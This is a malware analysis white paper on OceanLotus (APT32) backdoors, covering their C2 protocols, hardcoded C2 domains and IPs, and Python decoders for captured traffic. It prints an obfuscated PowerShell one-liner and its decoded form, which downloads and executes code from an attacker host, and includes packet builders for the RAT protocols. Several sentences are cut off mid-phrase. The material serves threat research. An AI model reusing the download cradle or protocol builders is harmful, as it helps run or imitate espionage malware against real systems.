# The SpyRATs of OceanLotus

## Malware Analysis White Paper

# Contents

- Introduction
- Components
- Roland RAT
  - Overview
  - Features
  - Behavior
  - C2
    - Protocol
    - Commands
- CamCapture Plugin
  - Overview
  - Features
  - Exported Functions
    - Screenshot Grabbing Exports
    - Video Capture Exports
    - Helper Exports
    - Unused Exports
- Remy RAT
  - Overview
  - Features
  - Deployment
  - Behavior
  - C2
    - Protocol
    - Commands
- Splinter RAT
  - Overview
  - Features
  - Behavior
  - C2
    - Protocol
    - Commands
    - Backdoor Error Codes
- CobaltStrike Beacon #1
  - Overview
  - Deployment
- CobaltStrike Beacon #2
  - Overview
  - Deployment
  - Behavior
- Rizzo
  - Overview
  - Behavior
  - C2
    - Protocol
    - Commands
- Denis
  - Overview
  - Behavior
- Network Intelligence
  - 167.114.44.146 (Whois, Domains, First seen)
  - 87.117.234.172 (Whois, Domains, First seen)
  - 27.102.67.42 (Whois, Domains, First seen)
  - 185.244.213.28 (Whois, First seen)
- Conclusions
- Appendix

### Introduction

During an incident response investigation in the final quarter of 2017, Cylance® incident responders and threat researchers uncovered several bespoke backdoors deployed by OceanLotus Group (a.k.a. APT32, Cobalt Kitty), as well as evidence of the threat actor using obfuscated CobaltStrike Beacon payloads to perform C2.
The threat actor routinely leveraged PowerShell within the environment, using one-liners to download/deploy malware, as well as obfuscators and reflective PE/shellcode loaders from various exploit kits (including MSFvenom, Veil, and DKMC), allowing much of the malware to operate in-memory, with no on-disk footprint.

The remote access trojans developed by OceanLotus Group (Roland, Remy, and Splinter, named after famous rodents) share subtle code similarities with “Backdoor.Win32.Denis” (Kaspersky), “WINDSHIELD” and “KOMPROGO” (FireEye). Roland was of particular interest in that it was carefully developed to mimic legitimate software DLLs developed by the victim organization.

The malware C2 protocols were largely tailored for each target, and supported a range of communication methods, from raw data over TCP sockets to HTTP/S proxying. In addition, the threat actor relied heavily upon CobaltStrike Beacon for providing malleable C2 communications.

The remaining white paper is dedicated to in-depth technical analysis of the malware, C2 protocols, TTPs, and general observations.

### Components

During the investigation, the following backdoors were uncovered:

| File Name | Classification |
|---|---|
| certcredprovider.dll.mui | Malware/Backdoor |
| underwears.png | Malware/Backdoor |
| wpfgfx_v0300.dll | Malware/Backdoor |
| plugin.lst | Malware/Infostealer |
| user.ico | Malware/Backdoor |
| img.png | Malware/Backdoor |
| mobsync.exe | Malware/Backdoor |
| varies | Malware/Backdoor |

### Roland RAT

**Overview**

Roland arrives as an un-obfuscated Win32 PE DLL. This particular version has been packaged to resemble a legitimate DLL, and contains a custom C2 protocol supporting a range of file, registry, process and memory operations, as well as a reverse shell, FTP file uploads, and retrieving system/user information.
**Features**

- Mimics legitimate DLL
- Custom C2 protocol
- 37 C2 commands

**Behavior**

Roland starts by creating a thread that initializes COM and dispatches to the main RAT entry-point, passing parameters supplied by the calling application via the heap:

_Figure 1: Roland RAT entry-point_

The initial configuration supplied to the RAT is a UTF-16 encoded string, using newline characters (“\n”) to separate values in the following format:

- Hostname/IP
- Port
- Unused
- Victim ID
- Connection timeout

_Figure 2: Configuration format_

Note that the configuration is not bundled with the backdoor DLL, and is instead supplied as parameters by the calling application. Next, the RAT calls the GetAddrInfoW API on the supplied hostname/IP, opens the socket, and connects to the C2 server:

_Figure 3: GetAddrInfoW/socket/connect_

_Figure 4: C2 handshake_

After a successful handshake, the RAT will attempt to receive and process new commands issued by the C2 server in a loop:

_Figure 5: C2 command loop_

**C2**

**_Protocol_**

The Roland C2 protocol is relatively simple, employing a simple handshake and a common header packet prior to all request/response payloads:

- Handshake
- Request Header
- Request and Parameters
- Response Header
- Response and Data

_Figure 6: C2 protocol overview_

Checksums are loosely based on the MS-PST CRC32 algorithm, but require only the first four tables:

```python
import struct

# CRC32.Offset32 .. CRC32.Offset56 are the first four MS-PST CRC lookup tables
# (256 entries each); they are not reproduced here.
def checksum(buffer, crc32=0xffffffff):
    offset = 0
    # the leading len % 4 bytes are folded in one byte at a time...
    for i in range(0, len(buffer) % 4):
        crc32 = CRC32.Offset32[(struct.unpack("B", buffer[offset:offset+1])[0] ^ crc32) & 0xff] ^ (crc32 >> 8)
        offset += 1
    # ...and the remaining whole dwords with four table lookups per dword
    for i in range(0, len(buffer) // 4):
        crc32 ^= struct.unpack("I", buffer[offset:offset + 4])[0]
        crc32 = (CRC32.Offset56[crc32 & 0xff] ^ CRC32.Offset48[(crc32 >> 8) & 0xff]
                 ^ CRC32.Offset40[(crc32 >> 16) & 0xff] ^ CRC32.Offset32[(crc32 >> 24) & 0xff])
        offset += 4
    return ~crc32 & 0xffffffff
```

Compression is performed using zlib (with the library containing the string “Fast decoding Code from Chris Anderson”), and can be inflated using the following code:

```python
import zlib

def decompress(data):
    """Decompress using zlib"""
    decompress = zlib.decompressobj()
    inflated = decompress.decompress(data)
    inflated += decompress.flush()
    return inflated
```

Request/response data is trivially encoded using byte-level XOR with a key of 0xC7.

is random), followed by a 64-byte victim ID. The server then responds with a 64-byte payload (sent byte-by-byte), assumed to be a session ID (this is not verified by the client):

_Figure 7: Handshake_

After a successful handshake, the attacker is free to start issuing commands. A 100-byte header specifies the size of the following data, as well as the checksum. XOR encrypted command data is sent next (at least 160 bytes), containing the command ID, lengths, checksums, and any parameters:

_Figure 8: C2 request header and encoded request data_

```c
typedef struct _C2_HEADER {
    unsigned char Padding[20];      /* Can be null */
    unsigned long SizeOfData;       /* Size of next packet (C2_REQUEST_DATA/C2_RESPONSE_DATA) */
    unsigned long ChecksumOfData;   /* Checksum of next packet (C2_REQUEST_DATA/C2_RESPONSE_DATA) */
    unsigned char SessionId[64];    /* Possibly contains a copy of the session ID */
    unsigned long Magic;            /* Can be null for requests, 0x005A15E9 for response */
    unsigned long Trailing;         /* Can be null */
} C2_HEADER, *PC2_HEADER;
```

_Figure 9: C2 header structure_

```c
typedef struct _C2_REQUEST_DATA {
    unsigned char Padding[132];               /* Can be null */
    unsigned long CommandId;                  /* eg. 0x5B (volume_info) */
    unsigned long Unused;
    unsigned long ParametersLength;           /* Length of Parameters[] */
    unsigned long UnpackedParametersLength;   /* If != ParametersLength then use zlib */
    unsigned long ParametersCrc;              /* Checksum of Parameters[] */
    unsigned long UnpackedParametersCrc;      /* Checksum of decompressed Parameters[] */
    unsigned long HeaderCrc;                  /* Checksum of preceding 0x9c bytes */
    unsigned char Parameters[];               /* Parameters as UNICODE string or compressed with zlib */
} C2_REQUEST_DATA, *PC2_REQUEST_DATA;
```

_Figure 10: C2 request structure_

The RAT will process the command before sending a response to the server comprising another header, followed by the response data, which contains the lengths, checksums, and response data (possibly zlib compressed):

_Figure 11: C2 response header and encoded response data_

```c
typedef struct _C2_RESPONSE_DATA {
    unsigned char VictimId[64];
    unsigned char SessionId[64];
    unsigned long BotVersion;           /* 0x487 */
    unsigned long CommandId;            /* eg. 0x5B (volume_info) */
    unsigned long ErrorCode;            /* Command error code */
    unsigned long DataLength;           /* Length of Data[] */
    unsigned long UnpackedDataLength;   /* Unpacked length of Data[] */
    unsigned long DataCrc;              /* Checksum of Data[] */
    unsigned long UnpackedDataCrc;      /* Checksum of decompressed Data[] */
    unsigned long HeaderCrc;            /* Checksum of preceding 0x9c bytes */
    unsigned char Data[];               /* Response, compressed using zlib */
} C2_RESPONSE_DATA, *PC2_RESPONSE_DATA;
```

_Figure 12: C2 response header_

The following commands were supported by the version of Roland analyzed:

_Figure 13: exec_cmd running ipconfig_

_Figure 14: Information collected by get_system_info command_

_Figure 15: Custom archive file_

### CamCapture Plugin

| Classification | Malware/Infostealer |
|---|---|
| Size | 118KB (120320 bytes) |
| Type | Win32 PE (DLL) |
| File Name | plugin.lst |
| Timestamp | Wed, 24 Oct 2007 04:23:10 UTC (spoofed) |
| Observed | November 2017 |

**Overview**

This Win32 PE DLL arrives in a
partially obfuscated form with its entry point obscured by garbage opcodes, useless instructions, and non-linear code flow:

_Figure 16: Obfuscated entry point_

It exports several functions that can possibly be invoked with the use of the Roland backdoor’s run_dll command.

_Figure 17: Threat actor command to download and install Remy_

**Features**

- 10 functioning exports and five additional “template” exports
- Main functionality is to grab desktop screenshots and record webcam video
- Use of Microsoft Media Foundation (Mf.dll) and Video For Windows (avicap32.dll)

**Exported Functions**

Each function, besides FDITruncateCabinet and FDICopy, takes the following arguments:

- Pointer to Unicode string with parameters in a “-INT” format (eg. for sleep_timeout and quality: “-1200 -100”)
- Pointer to memory that will receive the address of the buffer with the captured image stream
- Pointer to memory that will receive the size of the capture buffer

The quality, show_wnd, and sleep_timeout parameters are optional and default to 0x32, 0, and 0 respectively. If show_wnd_bool is set, it will call ShowWindow in case the window is minimized.

**_Screenshot Grabbing Exports_**

| Name | Parameters |Description |
|---|---|---|
| FCICreate | quality | Grab screenshot of desktop window |
| FCIAddFile | quality | Grab screenshot of foreground window |
| FCIFlushFolder | hWnd, quality, show_wnd_bool, sleep_timeout | Grab screenshot of specified window |
| FCIDestroy | x1, y1, cx, cy, quality | Grab screenshot of specified rectangle in the foreground window |
| FDICreate | hWnd, x1, y1, cx, cy, quality, show_wnd, sleep_timeout | Grab screenshot of specified rectangle in the specified window |

These exports use a subset of GDI32 APIs to create a screenshot of the victim’s desktop or a specified window.
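Returning to the Roland RAT C2 framing documented in the previous section (100-byte C2_HEADER, C2_REQUEST_DATA, XOR 0xC7, zlib and the four-table checksum), the decoder below is an added example for inspecting captured Roland requests, not code from the Cylance paper. It assumes the MS-PST lookup tables are the standard reflected CRC-32 (polynomial 0xEDB88320) slicing-by-4 tables, which it regenerates, and that ChecksumOfData and ParametersCrc are computed over the XOR-decoded bytes; the sample packet is constructed with build_request() purely as a fixture.

```python
import struct
import zlib

XOR_KEY = 0xC7
HEADER_FMT = "<20sII64sII"    # C2_HEADER: Padding, SizeOfData, ChecksumOfData, SessionId, Magic, Trailing
REQ_FMT = "<132sIIIIIII"      # C2_REQUEST_DATA fixed part: Padding, CommandId, Unused, ParametersLength,
                              # UnpackedParametersLength, ParametersCrc, UnpackedParametersCrc, HeaderCrc
HEADER_LEN = struct.calcsize(HEADER_FMT)      # 100
REQ_FIXED_LEN = struct.calcsize(REQ_FMT)      # 160


def _crc_tables():
    """Assumption: the four MS-PST tables are the slicing-by-4 CRC-32 tables, rebuilt here."""
    t0 = []
    for i in range(256):
        c = i
        for _ in range(8):
            c = (c >> 1) ^ 0xEDB88320 if c & 1 else c >> 1
        t0.append(c)
    tables = [t0]
    for _ in range(3):
        tables.append([(v >> 8) ^ t0[v & 0xFF] for v in tables[-1]])
    return tables


OFFSET32, OFFSET40, OFFSET48, OFFSET56 = _crc_tables()


def checksum(buffer, crc32=0xFFFFFFFF):
    """Roland's checksum: the len % 4 leading bytes one at a time, then whole dwords."""
    offset = 0
    for _ in range(len(buffer) % 4):
        crc32 = OFFSET32[(buffer[offset] ^ crc32) & 0xFF] ^ (crc32 >> 8)
        offset += 1
    for _ in range(len(buffer) // 4):
        crc32 ^= struct.unpack_from("<I", buffer, offset)[0]
        crc32 = (OFFSET56[crc32 & 0xFF] ^ OFFSET48[(crc32 >> 8) & 0xFF]
                 ^ OFFSET40[(crc32 >> 16) & 0xFF] ^ OFFSET32[(crc32 >> 24) & 0xFF])
        offset += 4
    return ~crc32 & 0xFFFFFFFF


def xor_c7(data):
    """Byte-level XOR with the fixed key 0xC7 (symmetric: encodes and decodes)."""
    return bytes(b ^ XOR_KEY for b in data)


def inflate(data):
    d = zlib.decompressobj()
    return d.decompress(data) + d.flush()


def parse_request(stream):
    """Decode one header + XOR-encoded request; every checksum is verified before the data is trusted."""
    if len(stream) < HEADER_LEN + REQ_FIXED_LEN:
        raise ValueError("packet shorter than header + fixed request data")
    _pad, size, data_crc, session_id, _magic, _trail = struct.unpack_from(HEADER_FMT, stream)
    body = xor_c7(stream[HEADER_LEN:HEADER_LEN + size])
    if len(body) != size or size < REQ_FIXED_LEN:
        raise ValueError("SizeOfData does not match the captured bytes")
    if checksum(body) != data_crc:
        raise ValueError("ChecksumOfData mismatch")
    _pad, cmd, _unused, plen, uplen, pcrc, upcrc, hcrc = struct.unpack_from(REQ_FMT, body)
    if checksum(body[:REQ_FIXED_LEN - 4]) != hcrc:      # HeaderCrc covers the preceding 0x9c bytes
        raise ValueError("HeaderCrc mismatch")
    params = body[REQ_FIXED_LEN:REQ_FIXED_LEN + plen]
    if len(params) != plen or checksum(params) != pcrc:
        raise ValueError("ParametersCrc mismatch")
    if uplen != plen:                                   # differing lengths mean zlib-compressed parameters
        params = inflate(params)
        if len(params) != uplen or checksum(params) != upcrc:
            raise ValueError("UnpackedParametersCrc mismatch")
    return {"session_id": session_id, "command_id": cmd, "params": params.decode("utf-16-le")}


def build_request(command_id, params_text, session_id=b"\x00" * 64, compress=False):
    """Fixture builder for a constructed sample packet (not captured traffic)."""
    raw = params_text.encode("utf-16-le")
    packed = zlib.compress(raw) if compress else raw
    fixed = struct.pack("<132sIIIIII", b"\x00" * 132, command_id, 0, len(packed), len(raw),
                        checksum(packed), checksum(raw))
    body = fixed + struct.pack("<I", checksum(fixed)) + packed
    header = struct.pack(HEADER_FMT, b"\x00" * 20, len(body), checksum(body), session_id, 0, 0)
    return header + xor_c7(body)
```

Under the table assumption the checksum reduces to the ordinary CRC-32, so `checksum(b"123456789")` gives the familiar check value 0xCBF43926; the parser rejects any packet whose ChecksumOfData, HeaderCrc or ParametersCrc does not verify.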
_Figure 18: Screenshot functionality_

**_Video Capture Exports_**

| Name | Parameters | Description |
|---|---|---|
| FDIIsCabinet | sleep_timeout, quality | Creates a thread that will capture video using VFW - Video For Windows (avicap32.dll) |
| FDIDestroy | sleep_timeout, quality | Creates a thread that will capture video using MF - Microsoft Media Foundation (Mf.dll) |

The video capture functionality is based on two different implementations, one using Video For Windows, and the other using MS Media Foundation.
_Figure 19: VFW-based video capture_

_Figure 20: MF-based video capture_

**_Helper Exports_**

| Name | Parameters | Description |
|---|---|---|
| FDITruncateCabinet | none | Return 0xE42 (possibly the plugin version) |
| FDICopy | none | Enumerate video capture drivers |

_Figure 21: Get version_

_Figure 22: Enumerate drivers_

**_Unused Exports_**

The following functions call nothing besides the routine that parses the parameters; they possibly constitute a template function for further functionalities not yet implemented:

- CreateCompressor – template code for function with one parameter
- SetCompressorInformation – template code for function with two parameters
- QueryCompressorInformation – template code for function with three parameters
- ResetCompressor – template code for function with four parameters
- CloseCompressor – template code for function with five parameters

### Remy RAT

| Classification | Malware/Backdoor |
|---|---|
| Aliases | WINDSHIELD (FireEye) |
| Size | 355 KB (364,353 bytes) |
| Type | PowerShell/Shellcode/Win32 PE (DLL) |
| File Name | underwears.png |
| Timestamp | Thu, August 07 2008 01:43:09 UTC (spoofed) |
| Observed | November 2017 |

**Overview**

Arriving as an obfuscated PowerShell script built using the MSFvenom psh-reflection payload, the Remy DLL payload is ultimately unpacked, injected into memory, and executed via a Veil shellcode payload.

_Figure 23: Payload layers_

The Remy DLL shares code with Backdoor.Win32.Denis (Kaspersky), and appears to be related to the “WINDSHIELD” malware (described in the FireEye APT32 report).
**Features**

- Several PowerShell “wrappers”
- MSFvenom psh-reflection payload
- Veil powershell/shellcode_inject
- Main functionality is to download and execute next stage payloads
- Six additional C2 commands
- Proxy bypass

**Deployment**

Remy was downloaded and executed manually by the threat actor using a PowerShell one-liner:

_Figure 24: Threat actor command to download and install Remy_

**Behavior**

During loading, a C# source file is dropped to disk and compiled using the C# .NET compiler:

_Figure 25: Compiling .NET binary_

_Figure 26: C# compiler arguments_

Although a relatively novel technique, this does lead to the creation of multiple temporary files under the %APPDATA%\Temp folder:

_Figure 27: Files created during compilation_

The source file is relatively simple and is used to assist with importing Windows APIs:

_Figure 28: C# source code for importing Win32 APIs_

_Figure 29: PowerShell shellcode loader_

- RtlMoveMemory
- RtlZeroMemory
- VirtualAlloc
- GetProcAddress
- LoadLibrary

The shellcode then allocates executable memory via VirtualAlloc, unpacks the main DLL payload, and calls its entry-point function:

_Figure 30: Execute main payload DLL entry-point_

The payload is ~248 KB (253,952 bytes) large, and purports to have been compiled on Thu Aug 07 01:43:07 2008. Originally named XamlDiagnostics.dll, it exports a single entry-point named DllEntry. The DllEntry routine first loads advapi32.dll, imports/calls GetUserNameW, and attempts to create the following mutex to prevent multiple instances from running:

`_151c9beb11b29fe869098007192d8fa7_%USERNAME%_`

It then loads several libraries, resolves all necessary APIs, and decrypts embedded strings. Most of the strings are encrypted with a simple ADD 0x27 instruction.
_Figure 31: String decryption – mutex name_

The backdoor can be executed with credentials for web authentication specified as parameters via the command line:

XOR key), in the following format:

| Offset | Description |
|---|---|
| 0x00 | Magic (0x02) |
| 0x05 | Username length |
| 0x07 | Password length |
| 0x09 | Username |
| 0x09 + Username length | Password |

The RCDATA resource from the analyzed sample did not contain any hard-coded credentials:

| Bytes | ASCII | Description |
|---|---|---|
| 3B 6C 49 6C 5A 4B 6E 47 3D | ;lIlZKnG= | Encrypted resource content |
| 39 6C 49 6C 5A 4B 6E 47 3D | 9lIlZKnG= | Embedded XOR key |
| 02 00 00 00 00 00 00 00 00 | | Decrypted resource content |

_Figure 32: Decryption of RCDATA resource_

registry key:

_Figure 33: Check for C2 URL in registry_

_Figure 34: Decryption of URL from registry value_

| Value Name | Type | Size | Description |
|---|---|---|---|
| (default) | REG_BINARY | 32 bytes | Value sent by the C2 server upon initial communication; it's needed to initiate download/execution of additional malware stages |
| EditFlags | REG_BINARY | Variable | List of C2 URLs encoded with XOR 0x8A8B8C; can be set using one of the C2 commands |
| DisableProcessIsolation | REG_BINARY | 8 bytes | System time, set at the time of the first C2 connection |
| | REG_DWORD | 4 bytes | These values are queried/set by the C2 server during the process of downloading and executing additional stages |

the following hardcoded URLs:

- happy.abelleds.com
- far.ordanuy.com
- home.runnerfd.com
- dyndns.yceunca.com

_Figure 35: Hardcoded C2 domains_

The malware has the capability to detect and bypass the victim’s proxy configuration.
There are two possible operation modes:

- TCP sockets, on port 61781 (default) or on port 443 (in case the victim’s machine is configured to use a proxy)
- HTTP POST/GET on ports 80 or 443, with the optional use of authentication (supports Basic and Digest schemes)

**C2**

**_Protocol_**

Initially, the backdoor will connect to one of the C2 URLs using raw sockets and perform a simple handshake:

will first try to connect to the proxy and authenticate (if required):

- HTTP proxy (1) and HTTPS proxy (2) - connect to the proxy URL with the following header:

```
CONNECT %s:%d HTTP/1.1
Host: %s:%d
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36
```

_Figure 36: HTTP proxy URL headers_

Note: The User-Agent string first appeared in Chrome from February 2016.

_Figure 37: Connection via HTTP proxy_

The backdoor also supports Basic and Digest HTTP authentication methods. In the case of Digest authentication, the backdoor will use the hardcoded string “d35efe4ba43e3803d57b4945fa3ab5dd” as the value for the client nonce parameter.

_Figure 38: Strings related to HTTP authentication, hardcoded “cnonce” value highlighted_

- SOCKS5 proxy (5) – connect to the proxy server on the specified port and send a client connection request:

```
Send 3 bytes:  05 01 00
Recv 2 bytes:  05 00
Send 10 bytes: 05 01 00 01 + c2_port + c2_ip
Recv 10 bytes.
```
_Figure 39: Connection via socks5 proxy_

details of the first active network adapter (excluding loopback), and send this information to the C2 server:

- Send 4 bytes (size of the upcoming packet)
- Send packet with system information:

| Offset | Size | Description |
|---|---|---|
| 0x0000 | 4 bytes | Decompressed size |
| 0x0004 | 4 bytes | Compressed size |
| 0x0008 | | zlib compressed system information (decompressed size 0x199 bytes) |

_Figure 40: System information packet_

_Figure 41: Basic communication scheme_

_Figure 42: Decompressed system information structure_

The following diagram shows a request containing system information, with the compressed (green) and decompressed (red) sizes, zlib data (blue), and finally the decompressed information (pink):

commands and sending responses.

_Figure 44: Thread responsible for downloading and executing next stage payloads_

Once an internal event is set, the backdoor will contact the C2 server to download and execute additional stages. To do that, it will proceed as follows:

- Connect and send beacon based on the internally specified connection method
- Send 1 byte (0x06)
- Send data from the “(default)” value in the registry (32 bytes), zlib compressed
- Receive a 4-byte integer that will be used as the registry value name
- Send data from that registry value (4 bytes)
- Receive 4 bytes (size of upcoming packet)
- Receive zlib compressed packet containing next stage payload
- Decompressed data format: `regval_data_len` `regval_data` `path_len` `path` `file_content_size` `file_content` `commandline_len` `commandline`
- Write file_content to path (create directories if needed)
- Create process path commandline
- Set registry value to the regval_data
- Send 4-byte response (last error code).

Besides executing additional next-stage payloads, the backdoor can process six additional commands.
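The next-stage download sequence listed above ends with a zlib-compressed packet carrying regval_data, path, file_content and commandline; the decoder below for that packet is an added example, not code from the Cylance paper. It assumes each length field is a 4-byte little-endian integer (as the other sizes in this protocol are) and that path and commandline are UTF-16LE strings; the sample packet is constructed inline with build_packet().

```python
import struct
import zlib


def _take(blob, pos, n):
    """Return blob[pos:pos+n] and the new position, refusing to read past the end."""
    if n < 0 or pos + n > len(blob):
        raise ValueError("field runs past end of packet")
    return blob[pos:pos + n], pos + n


def _read_lv(blob, pos):
    """Read a 4-byte little-endian length followed by that many bytes (assumed layout)."""
    raw, pos = _take(blob, pos, 4)
    return _take(blob, pos, struct.unpack("<I", raw)[0])


def parse_stage(decompressed):
    """Split the inflated payload into its four length-prefixed fields, in the page's order."""
    pos = 0
    regval, pos = _read_lv(decompressed, pos)      # regval_data_len, regval_data
    path, pos = _read_lv(decompressed, pos)        # path_len, path
    content, pos = _read_lv(decompressed, pos)     # file_content_size, file_content
    cmdline, pos = _read_lv(decompressed, pos)     # commandline_len, commandline
    if pos != len(decompressed):
        raise ValueError("unexpected trailing bytes after commandline")
    return {
        "regval_data": regval,
        "path": path.decode("utf-16-le"),          # assumption: UTF-16LE strings
        "file_content": content,
        "commandline": cmdline.decode("utf-16-le"),
    }


def unwrap_packet(stream):
    """Consume one '4-byte size + zlib packet' unit from a captured server-to-client stream.

    Returns (parsed fields, bytes consumed) so a caller can keep walking the stream.
    """
    if len(stream) < 4:
        raise ValueError("no size prefix")
    size = struct.unpack("<I", stream[:4])[0]
    body = stream[4:4 + size]
    if len(body) != size:
        raise ValueError("truncated packet")
    return parse_stage(zlib.decompress(body)), 4 + size


def build_packet(regval, path, content, cmdline):
    """Fixture builder for a constructed sample packet (not captured traffic)."""
    def lv(b):
        return struct.pack("<I", len(b)) + b
    plain = (lv(regval) + lv(path.encode("utf-16-le"))
             + lv(content) + lv(cmdline.encode("utf-16-le")))
    body = zlib.compress(plain)
    return struct.pack("<I", len(body)) + body


# Constructed sample: a placeholder PE-like blob destined for a placeholder path.
SAMPLE_PACKET = build_packet(
    regval=b"\x01\x00\x00\x00",
    path="C:\\ProgramData\\example\\next_stage.exe",
    content=b"MZ" + b"\x00" * 62,
    cmdline="C:\\ProgramData\\example\\next_stage.exe",
)
```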
_Figure 45: Command processor_

The C2 command packets have the following format:

| Offset | Description |
|---|---|
| 0x00 | Unknown |
| 0x04 | Command ID |
| 0x08 | Length of parameters |
| 0x0C | Parameters |

The following commands are supported:

### Splinter RAT

**Overview**

Splinter arrives as an MSBuild project file containing a Base64 encoded PowerShell script generated using the MSFvenom psh-reflection module. As in the case of Remy, it utilizes on-the-fly C# compilation and strips off several PowerShell wrappers before the shellcode that calls the final payload is invoked. The backdoor itself is a Win32 PE EXE file and has the capability to collect information, download and execute payloads, run WMI queries, and manipulate files, processes, and registry entries. The overall functionality of Splinter appears largely in line with the “KOMPROGO” malware (as described in the FireEye APT32 report).
**Features**

- Several PowerShell “wrappers”
- MSFvenom psh-reflection payload
- Veil powershell/shellcode_inject
- Custom C2 protocol (different from Remy and Roland)
- 38 C2 commands
- Use of LZHAM for compression of backdoor response data

**Behavior**

The backdoor will not attempt to communicate with the C2 if any of these network monitors are running:

- wireshark.exe (check for running process)
- NetworkMiner.exe (check for running process)
- TCPView (check for window name)

_Figure 46: Find network monitors_

As in the case of other backdoors used by the OceanLotus Group, the most sensitive strings, including hardcoded C2 addresses, are stack-based and obfuscated with a one-byte incremental XOR:

_Figure 47: Stack-based string decryption_

_Figure 48: String decryption loop_

The following URLs are hardcoded in the binary:

- rss.honoremarson[.]com (89.249.65.134, 185.244.213.28)
- repo.paigeherzog[.]com (89.249.65.134, 185.244.213.28)
- ssl.wolfgangneudorf[.]com (89.249.65.134, 185.244.213.28)
- help.angelinagerste[.]com (69.64.147.33, 185.244.213.28)
- mms.garyschulze[.]com (69.64.147.35, 91.195.240.103)

The backdoor also maintains a hardcoded list of ports to use, including 443, 1364, and 35357.

After sending an initial handshake, composed of two hardcoded values (request code and victim’s ID) buried inside pseudo-random data, the backdoor will send the contents of the “Key” value from [HKLM|HKCU]\Software\Microsoft\GameCenter\Identity. If this value is empty or doesn’t exist, the malware will send a hardcoded string instead.

_Figure 49: C2 communication_

The C2 server is expected to respond first with a header that indicates the size of the upcoming packet, followed by a value that will be written by the backdoor to the same registry location. Then, the C2 communicates with the backdoor by sending a header containing the command code and length of parameters, followed by a packet containing the command parameters string.
**C2**

**_Protocol_**

The standard C2 request/response consists of a 40-byte header packet that includes the request code, a hardcoded value (bot version or victim ID), a compression indicator and the length of the upcoming data, and is padded with pseudo-randomly generated bytes. If the length field is not 0, the header is followed by a variable-size packet containing data, optionally compressed with the LZHAM algorithm.

The header of each C2 command packet additionally contains the command code, length of session ID, length of uncompressed data (optionally), and two boolean values indicating if the data is compressed and if the backdoor should compress the response. The size of the data packet is calculated by combining the length of data with the length of session ID. The session ID value sent by the C2 is prepended to the data packet in the backdoor’s response.

_Figure 50: Initial C2 packet with request code and victim ID highlighted in red_

_Figure 51: Second packet. RED: request code, size of data, victim id, compression bool; GREEN: data – hardcoded key_

**_Commands_**

| Command | Parameters | Description |
|---|---|---|
| 0x208B4194 | Source CSIDL, source filename, destination CSIDL, destination file name, overwrite existing bool | Copy specified file |

**_Backdoor Error Codes_**

### CobaltStrike Beacon #1

**Overview**

This PowerShell script unpacks a copy of Beacon from the Cobalt Strike penetration testing framework. When launched, it tries to reach adstripstravel.com/activity over HTTP (the same host it was originally downloaded from):

_Figure 52: C2 Traffic from Beacon DLL_

Is this a modified version of Beacon or straight out-of-the-box? The single exported function common to the Beacon DLL provides a pivot, linking a further 260 samples. Similarity between these and our payload is measured using the command line tool “tlsh”. From this, we determine 201 samples have a score of <=64 (out of 1000; i.e., very similar). BinDiff indicates the closest matching sample is 96% similar.
Comparison between the closest matching sample and our payload DLL reveals a lack of HTTP proxy support. This feature was added in Cobalt Strike 3.7. A further two unmatched functions in our pivot sample add support for file copying and moving – another feature added in Cobalt Strike 3.7. _Figure 53: Proxy support in pivot sample_ _Figure 54: Null proxy arguments in payload DLL_ ----- “ppid” command “to enable consent.exe to launch elevated processes with the non-elevated requester as the parent”. There are no primary unmatched functions, meaning the payload DLL is an unmodified version of Beacon from Cobalt Strike 3.6 or earlier. **Deployment** The following event was observed during forensic investigations: Windows PowerShell/PowerShell ID **[600]** **:EventData/Data** **->** **[0] Variable[1] Started[2]** ProviderName=Variable NewProviderState=Started SequenceNumber=11 HostName=ConsoleHost HostVersion=4.0 HostId=12988b1b-e7f7-43ee-a01f-0eb01b11ea22 HostApplication=POwErshElL **-nONiNtera -noL -noprOFI -EXE bYpasS -nOEXIT -w HIddEN -coMma “ $(Set-ItEM ‘variAble:OFS’** ‘’ )” **+[striNg]((** 95 **-83-78-54** **-** 62-62 **-** 120-115-97 **-** 59 **-121-** 116 **-** 124- 115 **-117-** 98 **-** 54 **-** 120-115 **-** 98-56 **-97** **-115-116** **-117** **-122-127-** 115-120-98-63 **-56** **-114** **-** 121-97- 120 **-** 122 **-121-119** **-** 114- 101-98 **-100-127-** 120 **-113** **-62-49-** 126-98 **-98-102** **-44-57** **-57** **-119** **-** 114- 10198-100-127 **-** 102-101-98 **-** 100-119 **-96-115** **-** 122- 56 **-** 117-121-123- 57-100- 115 **-101** **-** 121 **-** 99 **-100** **-117-115-101** **-57** **-127-** 123 **-119** **-** 113-115 **-101-57** **-127-123-** 113 **-56** **-** 102 **-120-** 113-49- 63- 63 **)** **|FoReACh** **{[ChaR]** **(** **$_-bxoR** 0x16 ) **}** **)+”$( Sv ‘OFs’ ‘ ‘) “|.** **((gET-VaRiabLe** ‘*MdR*’).NaMe[3-11-2]-joIN’’) EngineVersion= RunspaceId= PipelineId= CommandName= CommandType= ScriptName= CommandPath= CommandLine=- 
    EventData/Binary -> empty

_Figure 55: PowerShell event_

The decoded PowerShell evaluates to:

    IEX((new-object net.webclient).downloadstring('http://adstripstravel.com/user.ico'))

_Figure 56: Decoded PowerShell_

Note that the integer array as printed in the event above, XORed with 0x16, actually yields the `http://adstripstravel.com/resources/images/img.png` URL, while the array in the Beacon #2 event below, XORed with 0x1b, yields `user.ico`; the two HostApplication strings appear to have been transposed between the two events in layout.

### CobaltStrike Beacon #2

|Classification|Malware/Backdoor|
|---|---|
|Size|282 KB (289,385 bytes)|
|Type|PowerShell/Shellcode|
|File Name|img.png|
|Observed|November 2017|

**Overview**

This PowerShell script contains a simple shellcode backdoor operated over a named pipe and appears to be a component related to Cobalt Strike Beacon's malleable C2. Several versions of this backdoor have been observed using subtly different pipe names with the format `\\.\pipe\status_#` (where # is replaced with an integer).

**Deployment**

The following event was observed during forensic investigations (HostApplication reproduced as logged, with line wraps removed):

    Windows PowerShell/PowerShell ID [600] :EventData/Data -> [0] Variable [1] Started [2]
    ProviderName=Variable
    NewProviderState=Started
    SequenceNumber=11
    HostName=ConsoleHost
    HostVersion=4.0
    HostId=fcb07468-ed83-4082-b089-e92e26b6ed33
